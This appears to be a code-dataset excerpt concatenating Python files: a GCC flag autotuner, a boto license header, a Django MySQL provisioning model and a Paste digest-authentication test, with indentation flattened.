.replace('GGC_MIN_EXPAND_DEFAULT', '30')
.replace('GGC_MIN_HEAPSIZE_DEFAULT', '4096')
.replace('50 * 1024 * 1024', '52428800'))
try:
name, desc, default, param_min, param_max = ast.literal_eval(
'[' + param_def_str.split(',', 1)[1] + ']')
param_defaults[name] = {'default': default,
'min': param_min,
'max': param_max}
except:
log.exception("error with %s", param_def_str)
json.dump(param_defaults, open(PARAMS_DEFAULTS_CACHE_FILE, 'w'))
return param_defaults
def extract_working_params(self):
"""
Figure out which gcc params work (don't cause gcc to barf) by running
each one to test.
"""
params, err = subprocess.Popen(
[self.args.cc, '--help=params'], stdout=subprocess.PIPE).communicate()
all_params = re.findall(r'^ ([a-z0-9-]+) ', params, re.MULTILINE)
all_params = sorted(set(all_params) &
set(self.cc_param_defaults.keys()))
if os.path.isfile(PARAMS_WORKING_CACHE_FILE) and not args.no_cached_flags:
# use cached version
return json.load(open(PARAMS_WORKING_CACHE_FILE))
else:
log.info('Determining which of %s possible gcc params work',
len(all_params))
working_params = []
for param in all_params:
if self.check_if_flag_works('--param={}={}'.format(
param, self.cc_param_defaults[param]['default'])):
working_params.append(param)
json.dump(working_params, open(PARAMS_WORKING_CACHE_FILE, 'w'))
return working_params
def check_if_flag_works(self, flag, try_inverted=True):
cmd = args.compile_template.format(source=args.source, output=args.output,
flags=flag, cc=args.cc)
compile_result = self.call_program(cmd, limit=args.compile_limit)
if compile_result['returncode'] != 0:
log.warning("removing flag %s because it results in compile error", flag)
return False
if 'warning: this target' in compile_result['stderr']:
log.warning("removing flag %s because not supported by target", flag)
return False
if 'has been renamed' in compile_result['stderr']:
log.warning("removing flag %s because renamed", flag)
return False
if try_inverted and flag[:2] == '-f':
if not self.check_if_flag_works(invert_gcc_flag(flag),
try_inverted=False):
log.warning("Odd... %s works but %s does not", flag,
invert_gcc_flag(flag))
return False
return True
def manipulator(self):
m = manipulator.ConfigurationManipulator()
m.add_parameter(manipulator.IntegerParameter('-O', 0, 3))
for flag in self.cc_flags:
m.add_parameter(manipulator.EnumParameter(flag, ['on', 'off', 'default']))
for param in self.cc_params:
defaults = self.cc_param_defaults[param]
if defaults['max'] <= defaults['min']:
defaults['max'] = float('inf')
defaults['max'] = min(defaults['max'],
max(1, defaults['default']) * args.scaler)
defaults['min'] = max(defaults['min'],
max(1, defaults['default']) / args.scaler)
if param == 'l1-cache-line-size':
# gcc requires this to be a power of two or it internal errors
m.add_parameter(manipulator.PowerOfTwoParameter(param, 4, 256))
elif defaults['max'] > 128:
m.add_parameter(manipulator.LogIntegerParameter(
param, defaults['min'], defaults['max']))
else:
m.add_parameter(manipulator.IntegerParameter(
param, defaults['min'], defaults['max']))
return m
def cfg_to_flags(self, cfg):
flags = ['-O%d' % cfg['-O']]
for flag in self.cc_flags:
if cfg[flag] == 'on':
flags.append(flag)
elif cfg[flag] == 'off':
flags.append(invert_gcc_flag(flag))
for param in self.cc_params:
flags.append('--param=%s=%d' % (param, cfg[param]))
# workaround sets of flags that trigger compiler crashes/hangs
for bugset in self.cc_bugs:
if len(set(bugset) & set(flags)) == len(bugset):
flags.remove(bugset[-1])
return flags
def make_command(self, cfg):
return args.compile_template.format(source=args.source, output=args.output,
flags=' '.join(self.cfg_to_flags(cfg)),
cc=args.cc)
def get_tmpdir(self, result_id):
return './tmp/%d' % result_id
def cleanup(self, result_id):
tmp_dir = self.get_tmpdir(result_id)
shutil.rmtree(tmp_dir)
def run(self, desired_result, input, limit):
pass
compile_results = {'ok': 0, 'timeout': 1, 'error': 2}
def run_precompiled(self, desired_result, input, limit, compile_result,
result_id):
if self.args.force_killall:
os.system('killall -9 cc1plus 2>/dev/null')
# Make sure compile was successful
if compile_result == self.compile_results['timeout']:
return Result(state='TIMEOUT', time=float('inf'))
elif compile_result == self.compile_results['error']:
return Result(state='ERROR', time=float('inf'))
tmp_dir = self.get_tmpdir(result_id)
output_dir = '%s/%s' % (tmp_dir, args.output)
try:
run_result = self.call_program([output_dir], limit=limit,
memory_limit=args.memory_limit)
except OSError:
return Result(state='ERROR', time=float('inf'))
if run_result['returncode'] != 0:
if run_result['timeout']:
return Result(state='TIMEOUT', time=float('inf'))
else:
log.error('program error')
return Result(state='ERROR', time=float('inf'))
return Result(time=run_result['time'])
def debug_gcc_error(self, flags):
def fails(subflags):
cmd = args.compile_template.format(source=args.source, output=args.output,
flags=' '.join(subflags),
cc=args.cc)
compile_result = self.call_program(cmd, limit=args.compile_limit)
return compile_result['returncode'] != 0
if self.args.debug:
while len(flags) > 8:
log.error("compile error with %d flags, diagnosing...", len(flags))
tmpflags = filter(lambda x: random.choice((True, False)), flags)
if fails(tmpflags):
flags = tmpflags
# linear scan
minimal_flags = []
for i in xrange(len(flags)):
tmpflags = minimal_flags + flags[i + 1:]
if not fails(tmpflags):
minimal_flags.append(flags[i])
log.error("compiler crashes/hangs with flags: %s", minimal_flags)
def compile(self, config_data, result_id):
flags = self.cfg_to_flags(config_data)
return self.compile_with_flags(flags, result_id)
def compile_with_flags(self, flags, result_id):
tmp_dir = self.get_tmpdir(result_id)
try:
os.stat(tmp_dir)
except OSError:
os.mkdir(tmp_dir)
output_dir = '%s/%s' % (tmp_dir, args.output)
cmd = args.compile_template.format(source=args.source, output=output_dir,
flags=' '.join(flags),
cc=args.cc)
compile_result = self.call_program(cmd, limit=args.compile_limit,
memory_limit=args.memory_limit)
if compile_result['returncode'] != 0:
if compile_result['timeout']:
log.warning("gcc timeout")
return self.compile_results['timeout']
else:
log.warning("gcc error %s", compile_result['stderr'])
self.debug_gcc_error(flags)
return self.compile_results['error']
return self.compile_results['ok']
def run_with_flags(self, flags, limit):
return self.run_precompiled(None, None, limit,
self.compile_with_flags(flags, 0), 0)
def save_final_config(self, configuration):
"""called at the end of tuning"""
print "Best flags written to gccflags_final_config.{json,cmd}"
self.manipulator().save_to_file(configuration.data,
'gccflags_final_config.json')
with open('gccflags_final_config.cmd', 'w') as fd:
fd.write(self.make_command(configuration.data))
def flags_histogram(self, session):
counter = collections.Counter()
q = session.query(TuningRun).filter_by(state='COMPLETE')
total = q.count()
for tr in q:
print tr.program.name
for flag in self.cfg_to_flags(tr.final_config.data):
counter[flag] += 1.0 / total
print counter.most_common(20)
def flag_importance(self):
"""
Test the importance of each flag by measuring the performance with that
flag removed. Print out a table for paper
"""
with open(self.args.flag_importance) as fd:
best_cfg = json.load(fd)
flags = self.cfg_to_flags(best_cfg)
counter = collections.Counter()
baseline_time = self.flags_mean_time(flags)
for flag in flags[1:]:
delta_flags = [f for f in flags if f != flag]
flag_time = self.flags_mean_time(delta_flags)
impact = max(0.0, flag_time - baseline_time)
if math.isinf(impact):
impact = 0.0
counter[flag] = impact
print flag, '{:.4f}'.format(impact)
total_impact = sum(counter.values())
remaining_impact = total_impact
print r'\bf Flag & \bf Importance \\\hline'
for flag, impact in counter.most_common(20):
print r'{} & {:.1f}\% \\\hline'.format(flag, 100.0 * impact / total_impact)
remaining_impact -= impact
print r'{} other flags & {:.1f}% \\\hline'.format(
len(flags) - 20, 100.0 * remaining_impact / total_impact)
def flags_mean_time(self, flags, trials=10):
precompiled = self.compile_with_flags(flags, 0)
total = 0.0
for _ in xrange(trials):
total += self.run_precompiled(None, None, None, precompiled, 0).time
return total / trials
def prefix_hook(self, session):
if self.args.flags_histogram:
self.flags_histogram(session)
sys.exit(0)
if self.args.flag_importance:
self.flag_importance()
sys.exit(0)
def invert_gcc_flag(flag):
assert flag[:2] == '-f'
if flag[2:5] != 'no-':
return '-fno-' + flag[2:]
return '-f' + flag[5:]
if __name__ == '__main__':
opentuner.init_logging()
args = argparser.parse_args()
GccFlagsTuner.main(args)
| mit |
alex/boto | tests/integration/route53/domains/__init__.py | 113 | 1122 | # Copyright (c) 2014 Amazon.com, Inc. or its affiliates. All Rights Reserved
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish, dis-
# tribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the fol-
# lowing conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL-
# ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT
# SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
#
| mit |
badri/mysqlapi | mysqlapi/api/models.py | 1 | 8285 | # Copyright 2013 mysqlapi authors. All rights reserved.
# Use of this source code is governed by a BSD-style
# license that can be found in the LICENSE file.
import hashlib
import os
import re
import subprocess
import MySQLdb
from django.conf import settings
from django.db import models
from mysqlapi.api import creator
from mysqlapi.api.database import Connection
class InvalidInstanceName(Exception):
def __init__(self, name):
self.args = [u"%s is a invalid name."]
class InstanceAlreadyExists(Exception):
def __init__(self, name):
self.args = [u"Instance %s already exists." % name]
class DatabaseCreationError(Exception):
pass
def generate_password(string):
return hashlib.sha1(string + settings.SALT).hexdigest()
def generate_user(username):
if len(username) > 16:
_username = username[:12] + generate_password(username)[:4]
else:
_username = username
return _username
class DatabaseManager(object):
def __init__(self,
name,
host="localhost",
port="3306",
user="root",
password="root",
public_host=None):
self.name = canonicalize_db_name(name)
self._host = host
self.port = port
self.conn = Connection(self._host, self.port, user, password, "")
self._public_host = public_host
@property
def public_host(self):
if self._public_host:
return self._public_host
return self.host
def create_database(self):
self.conn.open()
cursor = self.conn.cursor()
sql = "CREATE DATABASE %s default character set utf8 " + \
"default collate utf8_general_ci"
cursor.execute(sql % self.name)
self.conn.close()
def drop_database(self):
self.conn.open()
cursor = self.conn.cursor()
cursor.execute("DROP DATABASE %s" % self.name)
self.conn.close()
def create_user(self, username, host):
self.conn.open()
cursor = self.conn.cursor()
username = generate_user(username)
password = generate_password(username)
sql = ("grant all privileges on {0}.* to '{1}'@'%'"
" identified by '{2}'")
cursor.execute(sql.format(self.name, username, password))
self.conn.close()
return username, password
def drop_user(self, username, host):
self.conn.open()
cursor = self.conn.cursor()
cursor.execute("drop user '{0}'@'%'".format(username))
self.conn.close()
def export(self):
cmd = ["mysqldump", "-u", "root", "-d", self.name, "--compact"]
return subprocess.check_output(cmd, stderr=subprocess.STDOUT)
def is_up(self):
try:
self.conn.open()
return True
except:
return False
finally:
self.conn.close()
@property
def host(self):
if self._host == "localhost":
return os.environ.get("MYSQLAPI_DATABASE_HOST", "localhost")
return self._host
class Instance(models.Model):
STATE_CHOICES = (
("pending", "pending"),
("running", "running"),
("error", "error"),
)
name = models.CharField(max_length=100, unique=True)
ec2_id = models.CharField(max_length=100, null=True, blank=True)
state = models.CharField(max_length=50,
default="pending",
choices=STATE_CHOICES)
reason = models.CharField(max_length=1000,
null=True,
blank=True,
default=None)
host = models.CharField(max_length=50, null=True, blank=True)
port = models.CharField(max_length=5, default="3306")
shared = models.BooleanField(default=False)
def is_up(self):
return self.state == "running" and self.db_manager().is_up()
def db_manager(self):
host = self.host
port = self.port
user = "root"
password = ""
public_host = None
if self.shared:
host = settings.SHARED_SERVER
user = settings.SHARED_USER
password = settings.SHARED_PASSWORD
public_host = settings.SHARED_SERVER_PUBLIC_HOST
elif ProvisionedInstance.objects.filter(instance=self).exists():
pi = ProvisionedInstance.objects.get(instance=self)
user = pi.admin_user
password = pi.admin_password
return DatabaseManager(self.name,
host=host,
port=port,
user=user,
password=password,
public_host=public_host)
class ProvisionedInstance(models.Model):
instance = models.ForeignKey(Instance, null=True, blank=True, unique=True)
host = models.CharField(max_length=500)
port = models.IntegerField(default=3306)
admin_user = models.CharField(max_length=255, default="root")
admin_password = models.CharField(max_length=255, blank=True)
def _manager(self, name=None):
if not hasattr(self, "_db_manager"):
self._db_manager = DatabaseManager(name=self.instance.name,
host=self.host,
port=self.port,
user=self.admin_user,
password=self.admin_password)
return self._db_manager
def alloc(self, instance):
if self.instance:
raise TypeError("This instance is not available")
self.instance = instance
try:
self._manager().create_database()
except Exception as exc:
raise DatabaseCreationError(*exc.args)
instance.host = self.host
instance.port = str(self.port)
instance.shared = False
instance.ec2_id = None
instance.state = "running"
instance.save()
self.instance = instance
self.save()
def dealloc(self):
if not self.instance:
raise TypeError("This instance is not allocated")
self._manager().drop_database()
self.instance.state = "stopped"
self.instance = None
self.save()
def create_database(instance, ec2_client=None):
instance.name = canonicalize_db_name(instance.name)
if instance.name in settings.RESERVED_NAMES:
raise InvalidInstanceName(name=instance.name)
if Instance.objects.filter(name=instance.name):
raise InstanceAlreadyExists(name=instance.name)
if settings.SHARED_SERVER:
return _create_shared_database(instance)
elif settings.USE_POOL:
return _create_from_pool(instance)
else:
return _create_dedicate_database(instance, ec2_client)
def _create_shared_database(instance):
db = DatabaseManager(
name=instance.name,
host=settings.SHARED_SERVER,
user=settings.SHARED_USER,
password=settings.SHARED_PASSWORD,
)
try:
db.create_database()
except MySQLdb.ProgrammingError as e:
if len(e.args) > 1 and "database exists" in e.args[1]:
raise InstanceAlreadyExists(name=instance.name)
raise
instance.state = "running"
instance.shared = True
instance.ec2_id = None
instance.save()
def _create_from_pool(instance):
provisioned_instance = ProvisionedInstance.objects.filter(
instance__isnull=True)[:1]
if not provisioned_instance:
raise DatabaseCreationError(instance,
"No free instances available in the pool")
provisioned_instance[0].alloc(instance)
def _create_dedicate_database(instance, ec2_client):
if not ec2_client.run(instance):
raise DatabaseCreationError(instance,
"Failed to create EC2 instance.")
instance.save()
creator.enqueue(instance)
def canonicalize_db_name(name):
if re.search(r"[\W\s]", name) is not None:
prefix = hashlib.sha1(name).hexdigest()[:10]
name = re.sub(r"[\W\s]", "_", name) + prefix
return name
| bsd-3-clause |
jjmleiro/hue | desktop/core/ext-py/Paste-2.0.1/tests/test_auth/test_auth_digest.py | 47 | 3076 | # (c) 2005 Clark C. Evans
# This module is part of the Python Paste Project and is released under
# the MIT License: http://www.opensource.org/licenses/mit-license.php
from paste.auth.digest import *
from paste.wsgilib import raw_interactive
from paste.httpexceptions import *
from paste.httpheaders import AUTHORIZATION, WWW_AUTHENTICATE, REMOTE_USER
import os
import six
def application(environ, start_response):
content = REMOTE_USER(environ)
start_response("200 OK",(('Content-Type', 'text/plain'),
('Content-Length', len(content))))
if six.PY3:
content = content.encode('utf8')
return [content]
realm = "tag:clarkevans.com,2005:testing"
def backwords(environ, realm, username):
""" dummy password hash, where user password is just reverse """
password = list(username)
password.reverse()
password = "".join(password)
return digest_password(realm, username, password)
application = AuthDigestHandler(application,realm,backwords)
application = HTTPExceptionHandler(application)
def check(username, password, path="/"):
""" perform two-stage authentication to verify login """
(status,headers,content,errors) = \
raw_interactive(application,path, accept='text/html')
assert status.startswith("401")
challenge = WWW_AUTHENTICATE(headers)
response = AUTHORIZATION(username=username, password=password,
challenge=challenge, path=path)
assert "Digest" in response and username in response
(status,headers,content,errors) = \
raw_interactive(application,path,
HTTP_AUTHORIZATION=response)
if status.startswith("200"):
return content
if status.startswith("401"):
return None
assert False, "Unexpected Status: %s" % status
def test_digest():
assert b'bing' == check("bing","gnib")
assert check("bing","bad") is None
#
# The following code uses sockets to test the functionality,
# to enable use:
#
# $ TEST_SOCKET py.test
#
if os.environ.get("TEST_SOCKET",""):
from six.moves.urllib.error import HTTPError
from six.moves.urllib.request import build_opener, HTTPDigestAuthHandler
from paste.debug.testserver import serve
server = serve(application)
def authfetch(username,password,path="/",realm=realm):
server.accept(2)
import socket
socket.setdefaulttimeout(5)
uri = ("http://%s:%s" % server.server_address) + path
auth = HTTPDigestAuthHandler()
auth.add_password(realm,uri,username,password)
opener = build_opener(auth)
result = opener.open(uri)
return result.read()
def test_success():
assert "bing" == authfetch('bing','gnib')
def test_failure():
# urllib tries 5 more times before it gives up
server.accept(5)
try:
authfetch('bing','wrong')
assert False, "this should raise an exception"
except HTTPError as e:
assert e.code == 401
def test_shutdown():
server.stop()
| apache-2.0 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.